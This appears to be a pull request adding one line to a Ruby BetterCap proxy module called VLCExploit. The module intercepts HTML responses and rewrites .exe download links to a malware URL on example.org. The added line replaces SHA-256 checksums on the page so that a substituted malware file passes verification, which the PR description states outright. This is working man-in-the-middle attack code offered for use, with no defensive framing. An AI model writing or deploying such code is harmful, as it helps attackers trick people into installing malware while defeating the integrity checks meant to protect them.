### PR TITLE
Replace SHA-256 checksum

### DIFF
--- a/exploit_vlc.rb
+++ b/exploit_vlc.rb
@@ -15,6 +15,7 @@ class VLCExploit < BetterCap::Proxy::HTTP::Module
 		if response.content_type =~ /^text\/html.*/
 			BetterCap::Logger.info "Exploit http://#{request.host}#{request.path}..".green
 			response.body.gsub! %r/["']http:\/\/*[^\s]+\.(exe)["']/i, "http://example.org/malware.exr"
+			response.body.gsub! /[a-f0-9]{64}/i, "fake_checksum_here"
 		end
 	end
 end


### PR DESCRIPTION
This exploit can also be used to replace the checksum with one that’s valid for your malware.